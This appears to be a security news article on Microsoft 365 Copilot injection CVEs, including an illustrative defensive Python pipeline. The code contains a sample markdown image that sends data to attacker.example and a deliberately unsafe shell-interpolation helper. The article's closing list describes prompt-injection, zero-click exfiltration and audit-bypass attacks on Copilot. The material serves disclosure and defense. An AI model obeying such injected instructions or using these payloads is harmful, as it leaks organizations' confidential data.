Critical Vulnerabilities in Microsoft 365 Copilot Expose Sensitive Information
Microsoft has recently addressed three critical vulnerabilities within its Microsoft 365 Copilot and Copilot Chat in Microsoft Edge, all disclosed on May 7, 2026. These flaws, identified as CVE-2026-26129, CVE-2026-26164, and CVE-2026-33111, posed significant risks by potentially allowing unauthorized access to sensitive information.
Overview of the Vulnerabilities
1. CVE-2026-26129: This vulnerability affected the Business Chat feature of Microsoft 365 Copilot. It involved improper neutralization of special elements in output used by downstream components, which could enable unauthorized attackers to disclose sensitive information over a network. Although specific CVSS metrics were not provided, the critical severity rating underscores the high confidentiality risk due to Copilot’s extensive access to enterprise data.
2. CVE-2026-26164: Also impacting Microsoft 365 Copilot, this flaw was classified under CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component — Injection). The vulnerability was network-based, required no privileges or user interaction, and had a high confidentiality impact. Microsoft assessed the likelihood of exploitation as Less Likely, with exploit code maturity listed as unproven.
3. CVE-2026-33111: This issue affected Copilot Chat embedded in Microsoft Edge and was categorized under CWE-77 (Improper Neutralization of Special Elements Used in a Command — Command Injection). Similar to CVE-2026-26164, it was network-accessible, required no privileges or user interaction, and had a high confidentiality impact. Given the widespread use of Edge in enterprise environments, this vulnerability was particularly concerning.
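Both weakness classes named above concern text produced by the assistant being handed to another component that interprets it: CWE-74 when a renderer or other consumer treats special elements in the output as markup or links, and CWE-77 when model text is assembled into a command. The following Python example, added here for illustration and not code from Microsoft or from the advisories, shows the defensive pattern for each in a generic assistant pipeline. The sample output, the allow-list hosts `contoso.sharepoint.com` and `teams.microsoft.com`, the external host `attacker.example`, the tool names `search_mail` and `open_document`, and the `mailsearch` command line are all assumed for the demonstration.

```python
import html
import json
import re
import shlex
from urllib.parse import urlparse

# Constructed sample of assistant output carrying "special elements" that a downstream
# component could interpret: a markdown image pointing at an external host (with data in
# the query string) and raw HTML. Hypothetical content, not taken from the advisories.
SAMPLE_OUTPUT = (
    "Summary: Q3 numbers are attached. "
    "![chart](https://attacker.example/c?d=secret) <script>alert(1)</script>"
)

# Assumed tenant allow-list of hosts the chat UI may link to or fetch from.
TRUSTED_LINK_HOSTS = {"contoso.sharepoint.com", "teams.microsoft.com"}

_MD_LINK = re.compile(r"!?\[([^\]]*)\]\(([^)\s]+)\)")


def neutralize_for_renderer(text: str) -> str:
    """CWE-74 mitigation: neutralize model output before a downstream renderer consumes it.

    Markdown links and images are kept only when their host is on the allow-list; any other
    link is reduced to its label, so the rendered page cannot request an external URL that
    carries tenant data in its query string. The result is then HTML-escaped so markup in
    the text is displayed literally instead of being interpreted.
    """

    def _rewrite(match: re.Match) -> str:
        label, url = match.group(1), match.group(2)
        host = (urlparse(url).hostname or "").lower()
        if host in TRUSTED_LINK_HOSTS:
            return match.group(0)
        return f"[blocked link: {label}]"

    return html.escape(_MD_LINK.sub(_rewrite, text), quote=True)


# Hypothetical tool registry: the only operations the assistant may trigger. Arguments are
# passed to Python callables as data; no command line is ever assembled from model text.
TOOLS = {
    "search_mail": lambda query, limit=5: f"searched mail for {query!r} (limit {limit})",
    "open_document": lambda doc_id: f"opened document {doc_id!r}",
}


def dispatch_tool_call(raw_model_output: str) -> str:
    """CWE-77 mitigation: structured dispatch instead of command-string building.

    The model must emit JSON of the form {"tool": <name>, "args": {...}}. The tool name is
    checked against the registry and arguments are validated as plain scalars, so shell
    metacharacters inside an argument cannot change which operation runs.
    """
    try:
        call = json.loads(raw_model_output)
    except json.JSONDecodeError:
        return "rejected: not a structured tool call"
    if not isinstance(call, dict):
        return "rejected: not a structured tool call"
    name = call.get("tool")
    if name not in TOOLS:
        return f"rejected: unknown tool {name!r}"
    args = call.get("args", {})
    if not isinstance(args, dict) or not all(
        isinstance(k, str) and isinstance(v, (str, int)) for k, v in args.items()
    ):
        return "rejected: bad arguments"
    try:
        return TOOLS[name](**args)
    except TypeError:
        return "rejected: argument mismatch"


def build_shell_line_unsafe(query: str) -> str:
    # Weak pattern shown for contrast: model text interpolated into a shell line, where a
    # ';' or '&&' inside the query would start a second command. 'mailsearch' is hypothetical.
    return f"mailsearch --query {query}"


def build_shell_line_safe(query: str) -> str:
    # If a shell cannot be avoided, quote every argument so the query stays one argument.
    return shlex.join(["mailsearch", "--query", query])
```

The two halves address the two CWEs independently: `neutralize_for_renderer` decides what the chat surface is allowed to show and fetch, while `dispatch_tool_call` makes the set of reachable operations a closed registry rather than whatever a command interpreter will accept. In a real deployment the allow-list would come from tenant configuration and the registry from the assistant's declared tools.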
Implications for Organizations
The integration of AI-powered tools like Microsoft 365 Copilot into daily workflows has streamlined tasks but also introduced new security challenges. These vulnerabilities highlight the unique risks associated with AI-driven productivity tools that aggregate and process vast amounts of organizational data, including emails, documents, and Teams conversations. Exploitation of such flaws could lead to unauthorized access to intellectual property, confidential communications, and restricted internal records.
Microsoft’s Response and Recommendations
Microsoft has fully mitigated these vulnerabilities at the service layer, so no patch needs to be installed and no action is required from end users or administrators. This proactive approach aligns with Microsoft’s commitment to transparency in its cloud services, as outlined in its Toward Greater Transparency: Unveiling Cloud Service CVEs program.
The company credited Estevam Arantes of Microsoft for discovering both CVE-2026-26129 and CVE-2026-26164, with additional credit to independent researcher 0xSombra for CVE-2026-26164. No acknowledgment was listed for CVE-2026-33111. Microsoft confirmed that none of these vulnerabilities were publicly disclosed or actively exploited prior to their publication.
Broader Context of Microsoft 365 Copilot Vulnerabilities
These recent disclosures are part of a series of security challenges identified in Microsoft 365 Copilot over the past year:
– Email Summarization Flaw: A security flaw in Microsoft 365 Copilot caused the AI assistant to incorrectly summarize email messages protected by confidentiality sensitivity labels, bypassing configured Data Loss Prevention (DLP) policies and exposing potentially sensitive organizational data to unauthorized AI processing. This issue, tracked under Microsoft reference CW1226324, was first flagged on February 4, 2026, and remains ongoing. Microsoft’s investigation identified a code-level defect as the root cause: Copilot inadvertently picked up items stored in users’ Sent Items and Drafts folders without honoring the confidentiality labels applied to those messages. As of February 11, 2026, Microsoft began deploying a fix across affected environments and is contacting a subset of impacted users to confirm that the remediation has taken effect. However, the rollout has not yet reached full saturation, and the issue remains unresolved for some organizations. Microsoft aims to provide a remediation timeline as the fix progresses. The scope of impact is broad: any organization with Microsoft 365 Copilot enabled and confidentiality labels configured on email could be affected. ([cybersecuritynews.com](https://cybersecuritynews.com/microsoft-365-copilot-bug/amp/?utm_source=openai))
– Cross-Prompt Injection Vulnerability (CVE-2026-26133): Researchers at Permiso Security disclosed a critical cross-prompt injection vulnerability in Microsoft 365 Copilot’s email summarization surfaces. This flaw allowed attackers to embed malicious instructions within emails, causing Copilot to generate convincing phishing content within its trusted summary interface. Microsoft confirmed the issue on January 28, 2026, began rolling out mitigations on February 17, completed the patch across all affected surfaces on March 11, and published the CVE on March 12, 2026, crediting Andi Ahmeti of Permiso Security for the discovery. ([cybersecuritynews.com](https://cybersecuritynews.com/microsoft-copilot-summarization-vulnerability/?utm_source=openai))
– Zero-Click Vulnerability (EchoLeak): A critical zero-click vulnerability in Microsoft 365 Copilot, dubbed EchoLeak, enabled attackers to exfiltrate sensitive organizational data without requiring any user interaction. The attack exploited design flaws in how Copilot processes and retrieves information from organizational data stores, allowing external attackers to send specially crafted emails that bypass multiple security layers. This vulnerability was particularly dangerous due to its zero-click nature, operating entirely in the background. ([cybersecuritynews.com](https://cybersecuritynews.com/zero-click-microsoft-365-copilot-vulnerability/?utm_source=openai))
– Audit Log Bypass: A significant security vulnerability was discovered in Microsoft’s Copilot for M365 that allowed users, including potential malicious insiders, to access and interact with sensitive files without leaving any record in the official audit logs. After patching the flaw, Microsoft reportedly decided against issuing a formal CVE or notifying its customers, leaving organizations unaware that their security logs from before the fix may be critically incomplete. ([cybersecuritynews.com](https://cybersecuritynews.com/copilot-vulnerability-breaks-audit-logs/amp/?utm_source=openai))
– Prompt Injection Vulnerability: A sophisticated vulnerability in Microsoft 365 Copilot allowed attackers to steal sensitive tenant data, including recent emails, through indirect prompt injection attacks. The
Category: Security News